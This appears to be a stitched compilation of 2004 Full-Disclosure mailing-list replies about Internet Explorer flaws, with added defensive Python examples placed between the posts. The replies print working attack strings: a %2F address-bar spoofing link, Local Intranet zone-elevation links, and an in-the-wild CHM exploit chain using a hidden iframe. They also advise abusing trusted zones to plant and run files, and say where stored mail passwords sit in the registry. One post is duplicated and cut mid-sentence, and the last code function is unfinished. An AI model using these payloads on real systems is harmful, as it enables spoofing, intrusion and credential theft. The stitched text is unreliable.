A script from site A can only replace the contents of a window object within a frame from site B if site B is specifically opened through scripting from site A. Site A cannot interact with any window object that it has not created itself, it has to open a new window, wait for it to load and then load a new document in the frame inside this new window. It doesn't even know if you already have an existing browser window pointing at WindowsUpdate or your banking site because it didn't open those windows.

You have to look at the prerequisite attack scenario. You are surfing to some random site and out of nowhere it opens WellsFargo.com or WindowsUpdate. At this point you are thinking one of 2 things, either

"What the.. I didn't go to WindowsUpdate/WellsFargo .. Let me just close that window .. Damn popups"

or

"Hey how nice, WindowsUpdate/WellsFargo magically appeared in front of me and I didn't even intend to go there .. I was just surfing for porn .. Let me hurriedly download some stuff from there and give it my account details"

Thor
[Full-Disclosure] RE: COELACANTH: Phreak Phishing Expedition]
You can't replicate this with most other servers because the Host header is set to a non-existent site on most servers.

Whenever IIS or Apache receives a request it will first locate the proper site based on the IP address being used, after which it will look up based on the Host header. In the case of e-gold, they have simply not specified a Host header for the IIS website that they configured. You can send an HTTP request to e-gold.com with "Host: foobar" and their site still comes up, even though you should only get their site with a header such as "Host: e-gold.com" or "Host: www.e-gold.com".

HTTP 1.1 requires the use of a Host header and it is bad practice to accept HTTP requests without a Host header that corresponds to a locally configured site. In most cases with IIS, this only happens if you are using the Default Website or have explicitly chosen to not specify a Host header for the site. You can specify multiple Host headers for a site so there is not much excuse not to do so.

Whenever IE wants to send an HTTP request it first needs to determine what server to connect to. Because of the URL escaping IE disregards anything before the slash and equal sign, and sees that it has to send an HTTP request to www.e-gold.com. It is only after IE has determined what server to request information from that it URL decodes the URI and ends up with http://www.microsoft.com/redir=www.e-gold.com, which it then displays in the Address Bar and subsequently uses to determine what security zone it should use to render the HTML. IE only decides what security zone to use based on the Address Bar value after it has successfully downloaded all of the HTML (until then it is in the Unknown Zone), at which point the URL decoding has long since happened.

If you want to exploit this to serve content from your site in the security zone of another site, you will need to disregard the Host header being sent by the client. A perfect candidate you can use to gain additional privileges is WindowsUpdate.microsoft.com or oca.microsoft.com, which are both in the Trusted Sites security zone on a default installation of Windows Server 2003 and Windows XP SP2. You should be able to use this to compromise Windows XP SP2 through Internet Explorer despite the My Computer zone hardening since the Trusted Sites Zone has all of the privileges you need to plant and execute a file.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: Drew Copley [mailto:[EMAIL PROTECTED]]
Sent: Thursday, June 10, 2004 4:40 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Fwd: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition]

> Subject: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition
> From: [EMAIL PROTECTED] [EMAIL PROTECTED]
> Date: Thu, June 10, 2004 12:35 pm
> To: [EMAIL PROTECTED]
>
> --
> Thursday, June 10, 2004
>
> The following was presented by 'bitlance winter' of Japan today:
>
> <a href="http://www.microsoft.com%2F redir=www.e-gold.com">test</a>
>
> Quite inexplicable from these quarters. Perhaps someone with server 'knowledge' can examine it. It carries over the address into the address bar:
>
> [screen shot: http://www.malware.com/gosh.png 72KB]
>
> while redirecting to egold. The key being %2F, without that it fails. The big question is where is the 'redir' and why is it only applicable [so far] to e-gold. Other sites don't work and e-gold is running an old Microsoft-IIS/4.0.

IE makes this into a connection with e-gold.com like so:

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)
Host: www.microsoft.com/ redir=www.e-gold.com
Connection: Keep-Alive

It never touches microsoft.com. What is interesting, though, is IE spoofs the zone. If you change www.microsoft.com in there to a site in your trusted zone, you will see e-gold read as your trusted zone. So, you should be able to bounce from any trusted zone and theoretically from local zone -- and with adodb still being open, you should be able to run code because of the open adodb issue.

IE doesn't talk to e-gold first. It connects to it. It sends the GET request, it receives the first page. But, can't replicate with other servers. It requires some more research.

> Working Example:
> http://www.malware.com/golly.html
>
> credit: 'bitlance winter'
[Full-Disclosure] RE: COELACANTH: Phreak Phishing Expedition
You can't replicate this with most other servers because the Host header is set to a non-existent site on most servers. However, you can use this to gain both Trusted Sites and Intranet Sites privileges from arbitrary websites.

Whenever IIS or Apache receives a request it will first locate the proper site based on the IP address being used, after which it will look up based on the Host header. In the case of e-gold, they have simply not specified a Host header for the IIS website that they configured. You can send an HTTP request to e-gold.com with "Host: foobar" and their site still comes up, even though you should only get their site with a header such as "Host: e-gold.com" or "Host: www.e-gold.com".

HTTP 1.1 requires the use of a Host header and it is bad practice to accept HTTP requests without a Host header that corresponds to a locally configured site. In most cases with IIS, this only happens if you are using the Default Website or have explicitly chosen to not specify a Host header for the site. You can specify multiple Host headers for a site so there is not much excuse not to do so.

Whenever IE wants to send an HTTP request it first needs to determine what server to connect to. Because of the URL escaping IE disregards anything before the slash and equal sign, and sees that it has to send an HTTP request to www.e-gold.com. It is only after IE has determined what server to request information from that it URL decodes the URI and ends up with http://www.microsoft.com/redir=www.e-gold.com, which it then displays in the Address Bar and subsequently uses to determine what security zone it should use to render the HTML. IE only decides what security zone to use based on the Address Bar value after it has successfully downloaded all of the HTML (until then it is in the Unknown Zone), at which point the URL decoding has long since happened.

If you want to exploit this to serve content from your site in the security zone of another site, you will need to disregard the Host header being sent by the client. A perfect candidate you can use to gain additional privileges is WindowsUpdate.microsoft.com or oca.microsoft.com, which are both in the Trusted Sites security zone on a default installation of Windows Server 2003 and Windows XP SP2. You should be able to use this to compromise Windows XP SP2 through Internet Explorer despite the My Computer zone hardening since the Trusted Sites Zone has all of the privileges you need to plant and execute a file.

Other than gaining access to the Trusted Sites zone, you can further gain access to the execution privileges of the Local Intranet zone by explicitly leaving out a TLD (Top Level Domain) in the first part of the query. The following immediately gain Local Intranet privileges:

http://whatever%3fredir=www.e-gold.com
http://whatever%3fredir=yourevilsite.com

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: Drew Copley [mailto:[EMAIL PROTECTED]]
Sent: Thursday, June 10, 2004 4:40 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Fwd: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition]

> Subject: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition
> From: [EMAIL PROTECTED] [EMAIL PROTECTED]
> Date: Thu, June 10, 2004 12:35 pm
> To: [EMAIL PROTECTED]
>
> --
> Thursday, June 10, 2004
>
> The following was presented by 'bitlance winter' of Japan today:
>
> <a href="http://www.microsoft.com%2F redir=www.e-gold.com">test</a>
>
> Quite inexplicable from these quarters. Perhaps someone with server 'knowledge' can examine it. It carries over the address into the address bar:
>
> [screen shot: http://www.malware.com/gosh.png 72KB]
>
> while redirecting to egold. The key being %2F, without that it fails. The big question is where is the 'redir' and why is it only applicable [so far] to e-gold. Other sites don't work and e-gold is running an old Microsoft-IIS/4.0.

IE makes this into a connection with e-gold.com like so:

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)
Host: www.microsoft.com/ redir=www.e-gold.com
Connection: Keep-Alive

It never touches microsoft.com. What is interesting, though, is IE spoofs the zone. If you change www.microsoft.com in there to a site in your trusted zone, you will see e-gold read as your trusted
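The two messages above describe one URL being parsed in two different orders (split first, or percent-decode first), a server that answers any Host header, and zone assignment from the decoded host. The following is an added example, not code from the thread, that shows each of those three points offline; the URL and host names come from the thread, while the site bindings, the zone model and all function names are constructed for the example.

```python
import re
from typing import Dict, Optional, Tuple
from urllib.parse import unquote, urlsplit

# URL from the thread: the %2F hides a slash inside what looks like the
# authority (host) part of the URL.
RAW_URL = "http://www.microsoft.com%2Fredir=www.e-gold.com"

# Constructed IIS-style site bindings: Host header value -> site name.
# STRICT_BINDINGS only answers for explicitly configured names.
# LAX_BINDINGS binds "" as a catch-all, which is the e-gold setup the
# thread describes: any Host value returns the site.
STRICT_BINDINGS: Dict[str, str] = {"www.e-gold.com": "egold", "e-gold.com": "egold"}
LAX_BINDINGS: Dict[str, str] = {"": "egold"}

# Hosts the thread says sit in Trusted Sites on a default XP SP2 / 2003 install.
TRUSTED_SITES = {"windowsupdate.microsoft.com", "oca.microsoft.com"}

# DNS-style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def is_valid_hostname(host: str) -> bool:
    """Reject anything that is not a plain DNS name (no %, =, / and so on)."""
    return bool(HOSTNAME_RE.match(host))


def split_then_decode(url: str) -> Tuple[str, str]:
    """Safe order: split the raw URL into components, then decode each.

    The authority keeps its %2F, so 'www.microsoft.com%2Fredir=www.e-gold.com'
    is seen for what it is: not a hostname at all.
    """
    parts = urlsplit(url)
    return parts.netloc, unquote(parts.path)


def decode_then_split(url: str) -> Tuple[str, str]:
    """Unsafe order: decode the whole URL first, then split it.

    %2F has become a real slash, so the authority is now 'www.microsoft.com'
    and 'redir=www.e-gold.com' has moved into the path. This is the view the
    thread says IE used for the Address Bar and the zone decision.
    """
    parts = urlsplit(unquote(url))
    return parts.netloc, parts.path


def host_views_disagree(url: str) -> bool:
    """True when the two parsing orders name different hosts, or the raw
    authority is not a valid hostname. Such a URL should be refused before
    any connection is made; the thread's issue needs one component to use
    each view."""
    raw_host, _ = split_then_decode(url)
    decoded_host, _ = decode_then_split(url)
    return raw_host != decoded_host or not is_valid_hostname(raw_host)


def select_site(host_header: str, bindings: Dict[str, str]) -> Optional[str]:
    """Server side: map an incoming Host header to a configured site.

    With strict bindings an unknown name such as 'foobar' gets None (refuse
    the request). A "" binding is the catch-all that made e-gold answer
    regardless of the Host value.
    """
    host = host_header.strip().lower()
    if host in bindings:
        return bindings[host]
    return bindings.get("")


def zone_for_host(host: str) -> str:
    """Simplified model of the zone rules the thread relies on (constructed
    for this example, not IE's full algorithm, which also consults proxy
    bypass lists and user-defined site lists).

    Named trusted hosts -> Trusted Sites; a dotless name, i.e. one with no
    TLD -> Local Intranet; anything else -> Internet.
    """
    host = host.lower()
    if host in TRUSTED_SITES:
        return "Trusted Sites"
    if "." not in host:
        return "Local Intranet"
    return "Internet"


if __name__ == "__main__":
    print("split then decode :", split_then_decode(RAW_URL))
    print("decode then split :", decode_then_split(RAW_URL))
    print("views disagree    :", host_views_disagree(RAW_URL))
    print("Host: foobar, strict:", select_site("foobar", STRICT_BINDINGS))
    print("Host: foobar, lax   :", select_site("foobar", LAX_BINDINGS))
    print("zone(whatever)      :", zone_for_host("whatever"))
```

The defensive reading is the one the thread gives: parse before you decode so the two host views can never differ, and bind every site to explicit Host names so an unknown Host value is refused rather than served.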
[Full-Disclosure] RE: Internet explorer .clsid vulnerability
This is actually a behavior that is part of Windows Explorer, not Internet Explorer. I think we have covered this in the past on lists as well. If it is not already documented somewhere it should be, as this is how Windows file queries (inside IE) are performed on the local file system.

Basically, you must first circumvent security zone restrictions and gain access to execute HTML files from the local file system in the first place before this is an issue. At this time, it is much more interesting to use your newly gained privileges to plant an EXE file and execute it instead of just launching the already installed applications.

When your HTML document is opened from the local file system, its working directory is C:\DIR\test.html (equivalent to the URL FILE://C:/DIR/test.html). If you click on a link to XX from here or have it open automatically through an iframe, the browser asks for FILE://C:/DIR/XX (XX through the FILE protocol from the C:/ host in the DIR directory). In this case, we are asking the browser to retrieve FILE://C:/DIR/Roozbeh.{3E9BAF2D-7A79-11d2-9334-F875AE17}.

IE queries HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints\C to see if the Host is known (btw, all temporary NetBIOS sessions are stored here as integers, my currently open share in the dirty network to \\someserver\c$ is labelled 6 instead of C). It then checks both HKCU and HKCR in order for instances of that GUID and eventually finds C:\PROGRA~1\NETMEE~1\conf.exe in HKCR\CLSID\{3E9BAF2D-7A79-11d2-9334-F875AE17}\LocalServer32\(Default) which it then launches.

You can see this entire registry brawl at http://jscript.dk/2004/5/clsid.regmon.log

If you try to test your POC from an Internet or Intranet site you will see that the browser simply asks for a document on the server and in return gets a 404 Not Found.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
http://www.pivx.com/qwikfix

-----Original Message-----
From: roozbeh afrasiabi [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 20, 2004 3:52 PM
To: [EMAIL PROTECTED]
Subject: Internet explorer .clsid vulnerability

<snip>

<a href="Roozbeh.{3E9BAF2D-7A79-11d2-9334-F875AE17}">does not exist!</a>

<snip>
RE: [Full-Disclosure] Locking up Internet Explorer
Any link in the form of //something has the current protocol prepended to it. If you are on an HTTP site such as http://microsoft.com and click on a link to //msdn.microsoft.com you are in reality making a request for http://msdn.microsoft.com/. used to use these links all over the place, to save some bytes I guess.

The results of clicking on your link to //test/test depend on the security zone you are in. If you are in the Internet Zone you will be asking for http://test/test, if you are in the My Computer zone you will be asking for file://test/test which gets translated into \\test\test.

Regards
Thor

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tue 5/11/2004 9:08 AM
To: [EMAIL PROTECTED]
Cc:
Subject: [Full-Disclosure] Locking up Internet Explorer

The following code creates a link that causes Microsoft Internet Explorer to lock up. Restarting IE is required after clicking on the link.

<A HREF="//test/test">Lock up Internet Explorer</A>

The form of the link just has to be //*/* as far as I tried it. The IE version I used was 6.0.2800.1106.xpsp2.030422-1633CO.

CYA

--
You have new mail! - The GMX Toolbar informs you while you surf! Activate it now at http://www.gmx.net/info
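Thor's point above is that a scheme-relative link resolves differently depending on the scheme of the document it sits in: under http:// it is an ordinary HTTP request, under file:// the host part becomes a UNC server name. The following added example (not code from the thread) resolves links the way a browser does and audits a constructed HTML snippet for links that would turn into UNC lookups when the document is opened locally; the sample document, the function names and the example URLs other than //test/test and msdn.microsoft.com are constructed.

```python
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urljoin, urlsplit

# Constructed sample document. The first link has the shape from the thread;
# the others show what the audit leaves alone.
SAMPLE_HTML = """
<html><body>
<a href="//test/test">Lock up Internet Explorer</a>
<a href="//msdn.microsoft.com/library">MSDN (scheme-relative)</a>
<a href="page2.html">same directory</a>
<a href="https://example.invalid/x">absolute</a>
</body></html>
"""


class HrefCollector(HTMLParser):
    """Collect the href attribute of every <a> tag in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value is not None:
                    self.hrefs.append(value)


def extract_hrefs(html: str) -> List[str]:
    parser = HrefCollector()
    parser.feed(html)
    return parser.hrefs


def resolve_link(base_url: str, href: str) -> str:
    """Resolve href against the document it appears in, as a browser would.

    A '//host/path' link has no scheme of its own, so it inherits the base
    document's scheme: http:// on a web page, file:// on a local document.
    """
    return urljoin(base_url, href)


def effective_target(base_url: str, href: str) -> Tuple[str, str]:
    """Describe what following the link would actually touch.

    Returns (kind, target). For a file:// result with a host part the
    target is the UNC name Windows would try to reach, e.g. \\test\test,
    which is a network name lookup rather than a local file open.
    """
    resolved = resolve_link(base_url, href)
    parts = urlsplit(resolved)
    if parts.scheme == "file" and parts.netloc:
        unc = "\\\\" + parts.netloc + parts.path.replace("/", "\\")
        return ("unc", unc)
    return (parts.scheme, resolved)


def unc_lookups(base_url: str, html: str) -> List[Tuple[str, str]]:
    """Audit: links in html that, resolved against base_url, become UNC
    lookups. Empty when the document is served over http(s)."""
    findings = []
    for href in extract_hrefs(html):
        kind, target = effective_target(base_url, href)
        if kind == "unc":
            findings.append((href, target))
    return findings


if __name__ == "__main__":
    for base in ("http://microsoft.com/", "file:///C:/DIR/test.html"):
        print(base, "->", unc_lookups(base, SAMPLE_HTML))
```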
[Full-Disclosure] RE: MS04-011 Break SSL support in IE 6.0.3790.0 with Windows 2003
This is a functionality regression that has been around for some time. The weird part of the MS04-011 patch is that it only occurs on Windows 2003.

KB261328: Cipher Strength Appears as 0-Bit in Internet Explorer
http://support.microsoft.com/?kbid=261328

SYMPTOMS
In Microsoft Internet Explorer, you may experience the following behaviors:
When you click About Internet Explorer on the Help menu, the Cipher Strength value is 0-bit.
-and-
You cannot connect to and view Web pages on secure Web sites.

CAUSE
This behavior can occur if the Schannel.dll, Rsabase.dll, or Rsaenh.dll files are missing, damaged, or of the incorrect version.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix
http://www.qwik-fix.net

-----Original Message-----
From: Technoboy [mailto:[EMAIL PROTECTED]]
Sent: Friday, April 16, 2004 11:04 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] MS04-011 Break SSL support in IE 6.0.3790.0 with Windows 2003

Hello everyone,

A warning to all Windows 2003 users, this happened on two machines which had the exact same software configuration but different hardware.

After installing the latest set of patches from microsoft, I was unable to access sites using SSL, after some investigation it turned out that my IE Cipher strength was set to 0bit ...

After a lot of troubleshooting and tryouts with the different solutions offered by Microsoft I decided to take a guess and uninstall the MS04-011 patch... Well, the problem solved itself, the IE Cipher Strength is now at 128 like it was before, I can now access sites using SSL, windowsupdate, msn, etc

Weird ...

Anyone experienced something similar, or is it just me?
[Full-Disclosure] 4 new Microsoft patches to close 20 vulnerabilities
4 new Microsoft patches to close 20 vulnerabilities

It's patch Tuesday in Redmond and this April we have seen the release of MS04-011, MS04-012, MS04-013 and MS04-014. Microsoft has given all of these patches an impact of Remote Code Execution and the affected software ranges from Windows 98 to Windows 2003 64-Bit Edition. If you use Windows you will have to patch, preferably today. This week will see a wide range of vulnerability advisories and exploit releases. The documented functionality changes are few and minor.

Currently, these patches are not available on Windows Update (11:25AM pacific time), but I can only imagine that it is a matter of hours. They can be retrieved with MBSA, SMS and a wide range of patch management applications. The broad summary can be found at

http://www.microsoft.com/technet/security/bulletin/winapr04.mspx

Most of these vulnerabilities are new, but some of them are already known - as an example MS04-013 patches the massively exploited MHTML/CHM related vulnerabilities that were used by Ibiza, Bugbear.e and a wide range of trojans. In all, these 4 patches fix 20 vulnerabilities and replace 19 existing patches.

MS04-011
  LSASS Vulnerability - CAN-2003-0533
  LDAP Vulnerability - CAN-2003-0663
  PCT Vulnerability - CAN-2003-0719
  Winlogon Vulnerability - CAN-2003-0806
  Metafile Vulnerability - CAN-2003-0906
  Help and Support Center Vulnerability - CAN-2003-0907
  Utility Manager Vulnerability - CAN-2003-0908
  Windows Management Vulnerability - CAN-2003-0909
  Local Descriptor Table Vulnerability - CAN-2003-0910
  H.323 Vulnerability* - CAN-2004-0117
  Virtual DOS Machine Vulnerability - CAN-2004-0118
  Negotiate SSP Vulnerability - CAN-2004-0119
  SSL Vulnerability - CAN-2004-0120
  ASN.1 Double Free Vulnerability - CAN-2004-0123

MS04-012
  RPC Runtime Library Vulnerability - CAN-2003-0813
  RPCSS Service Vulnerability - CAN-2004-0116
  COM Internet Services (CIS) - RPC over HTTP Vulnerability - CAN-2003-0807
  Object Identity Vulnerability - CAN-2004-0124

MS04-013
  MHTML URL Processing Vulnerability - CAN-2004-0380

MS04-014
  Jet Vulnerability - CAN-2004-0197

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix
http://www.qwik-fix.net
RE: [Full-Disclosure] IE exploit going around on irc
The MS03-032 Object Data vulnerability dealt with improper handling of HTA mime-types. What Niek forwarded is using the Ibiza CHM exploit that deals with improper privileges gained through the ms-its/ms-itss URL protocol handlers which is still unpatched.

Roozbeh Afrasiabi on this and others:
http://www.securityfocus.com/archive/1/358913/2004-03-26/2004-04-01/0

Drew Copley:
http://www.securityfocus.com/archive/1/358914/2004-03-26/2004-04-01/0

My post in February:
http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix
http://www.qwik-fix.net

-----Original Message-----
From: David Jacoby [mailto:[EMAIL PROTECTED]]
Sent: Monday, April 05, 2004 11:38 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE exploit going around on irc

I just found this information:

http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor.html

Download.Tagdoor is a group of Trojan horses that exploit the Internet Explorer Object Tag Vulnerability. (This is described in Microsoft Security Bulletin MS03-032.)

((pewp))

On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:
> Hi list,
>
> this thing's been going around on irc the last few days:
>
> www.divx.dc-hub.com (IE users don't click it!)
>
> check source:
>
> <iframe src='loi.htm' width=0 height=0></iframe>
>
> loi.htm contains:
>
> <object data=ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm type=text/x-scriptlet></object>
>
> LOI.CHM is attached
>
> Regards,
> Niek Baakman
RE: [Full-Disclosure] IE exploit going around on irc
I'm sorry, I thought you were already aware of the text/x-scriptlet object variation of Ibiza which was exploited in the wild before Ibiza was even discussed on Bugtraq - I assumed you would catch my reference to this. Either way, this is still the ms-its/ms-itss CHM issue regardless of how you trigger it.

My bad, I will elaborate further in the future so we can avoid discussing semantics.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
[EMAIL PROTECTED]
Phone: +1 (949) 231-8496
PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix
http://www.qwik-fix.net

-----Original Message-----
From: Jelmer [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, April 06, 2004 2:05 PM
To: Thor Larholm; David Jacoby; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE exploit going around on irc

> What Niek forwarded is using the Ibiza CHM exploit that deals with improper privileges gained through the ms-its/ms-itss URL protocol handlers which is still unpatched.

But wrong. It's a variation of the ibiza exploit, the ibiza exploit didn't work on XP SP1, I know so because I checked at the time, and yes this variation is still unpatched
[Full-Disclosure] RE: new internet explorer exploit (was new worm)
Drew Copley already mentioned how this is the CHM exploit that the Ibiza exploit relied on. K-OTiK posted about this in http://www.securityfocus.com/archive/1/354447 and we posted details of the Ibiza CHM exploit a few weeks before then on the Unpatched mailing list ( http://unpatched.pivxlabs.com ). The Bizex worm also used Unpatched IE vulnerabilities as was detailed in http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0 Implementing proactive security measures such as locking down the My Computer zone prevents this from having an effect. Both of these issues were mitigated against months in advance with Qwik-Fix, which has just been released as Qwik-Fix Pro at the Gartner Symposium/ITxpo 2004. http://www.pivx.com/press_releases/qwikfixpro_gartner.html
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
-Original Message-
From: Void [mailto:[EMAIL PROTECTED]
Sent: Monday, March 29, 2004 11:15 AM
To: Jelmer; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: new internet explorer exploit (was new worm)
Just wanted to add that Norton Anti-Virus 2004 will detect this exploit and pop up a warning, but also fails to halt its execution or protect the user in any way. Here is what it thinks it is: http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html So there is some measure of warning, but no real protection.
[Full-Disclosure] Email legislation does not exist
From: Mike Barushok [mailto:[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Backdoor not recognized by Kaspersky
Then there is the 'rejection' problem. If the mail is not accepted, laws prohibit silently discarding it.
I don't mean to be rude, but what laws are you referring to? The internet is a collection of private networks running on private property. What law dictates that I am forced to accept any email, or any single packet of any kind, on my machine? It's an old saying, but it rings true: My network, my machine, my rules. Though perhaps a bit simply put, Doc Searls and David Weinberger highlight this same issue on http://www.worldofends.com/. Do we really want email to be legislated as regular postal services are? If so, should we not then be prohibited from running non-approved email servers? Doesn't the concept of email legislation itself oppose the basic structure of the Internet, by imposing legislation on private property? We legislate other private property such as guns based on their inherent danger, should we assume that machines connected to the Internet are by definition insecure and regulate them? (I have CC'ed the SecLegal mailing list)
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
RE: [Full-Disclosure] Backdoor not recognized by Kaspersky
From: Larry Seltzer [mailto:[EMAIL PROTECTED]
if you can read the user's login credentials to his corporate mailserver you are far better off.
Rather casually put. How would you do this? I've heard how Swen asks the user for their credentials, but if you know a general crack for obtaining them I'd say that's news.
I wouldn't call it news, try googling for Outlook Express Password Recovery and you will find numerous commercial solutions that programmatically give you the password. It's stored in a key called Password2 under HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\0001 where 0001 is the account number. The same applies to Outlook and any other mail application that allows the user to store their password locally. Since POP3 and SMTP are plaintext protocols the login credentials need to be stored in a form that can have them decrypted.
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
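An offline audit in the spirit of the reply above, added here as an example and not code from the post or from any recovery tool: it parses a `reg export` of the Internet Account Manager key and lists the accounts that carry a Password2 value, i.e. a mail password the user chose to remember locally, without attempting the decryption the commercial tools do. The .reg text is constructed for the example; the subkey digits follow the reply, while the full value names ("POP3 Password2", "SMTP Password2", "POP3 User Name" and the rest) and the hex blobs are assumptions made up here.

```python
import re

# Constructed sample of what `reg export` writes for the key named in the reply
# above.  The "0001"/"0002" subkeys follow the reply; every value name and the
# hex blobs are assumptions invented for this example, not data from a real box.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\0001]
"Account Name"="Work mail"
"POP3 Server"="pop.example.invalid"
"POP3 User Name"="alice"
"POP3 Password2"=hex:01,00,00,00,5e,1f,aa,03,9c,47,b1,66,\
  d2,ef,08,7a,3c,11,90,be
"SMTP Server"="smtp.example.invalid"
"SMTP Password2"=hex:01,00,00,00,77,0d,e4,29,fa,51,08,3b

[HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\0002]
"Account Name"="Personal"
"POP3 Server"="mail.example.invalid"
"POP3 User Name"="bob"
"POP3 Prompt for Password"=dword:00000001
"""

ACCOUNTS_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts"
VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg(text):
    """Parse the .reg subset that `reg export` emits: [key] headers and
    "name"="string" / dword:XXXXXXXX / hex:aa,bb,... values, where a trailing
    backslash continues a hex value on the next line.
    Returns {key_path: {value_name: (type_tag, value)}}."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.endswith("\\"):            # continuation of a hex: value
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, val = m.group(1), m.group(2)
        if val.startswith('"') and val.endswith('"'):
            keys[current][name] = ("REG_SZ", val[1:-1].replace("\\\\", "\\"))
        elif val.startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(val[len("dword:"):], 16))
        elif val.startswith("hex"):         # plain hex: and typed hex(N): forms
            blob = val.split(":", 1)[1]
            keys[current][name] = ("REG_BINARY",
                                   bytes(int(b, 16) for b in blob.split(",") if b))
        else:
            keys[current][name] = ("UNKNOWN", val)
    return keys


def stored_mail_credentials(reg_text):
    """Return each Internet Account Manager account whose export carries a
    *Password2 value, i.e. a mail password the user chose to remember.
    Only presence and blob length are reported; nothing is decrypted."""
    findings = []
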